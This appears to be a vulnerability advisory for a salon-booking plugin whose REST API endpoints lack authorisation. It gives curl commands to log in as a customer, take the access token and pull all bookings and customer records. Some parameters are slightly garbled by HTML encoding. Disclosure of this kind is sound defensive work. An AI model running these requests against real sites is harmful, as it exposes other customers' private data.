The plugin does not have proper authorisation in some of its endpoints, which could allow customers to access all bookings and other customer’s data
Make a booking to get a customer account Login via API and get access token: curl “https://example.com/?rest_route=/salon/api/v1/login&name;[email protected]&password;=11111111” response: {“status”:“OK”,“access_token”:“5ad1d8d73d058958e98987bec31a12d25c14b9ba”} Send requests to get all bookings/customers data using the access token curl “http://example.com/?rest_route=/salon/api/v1/bookings/” -H “Access-Token:5ad1d8d73d058958e98987bec31a12d25c14b9ba” curl “http://example.com/?rest_route=/salon/api/v1/customers/” -H “Access-Token:5ad1d8d73d058958e98987bec31a12d25c14b9ba”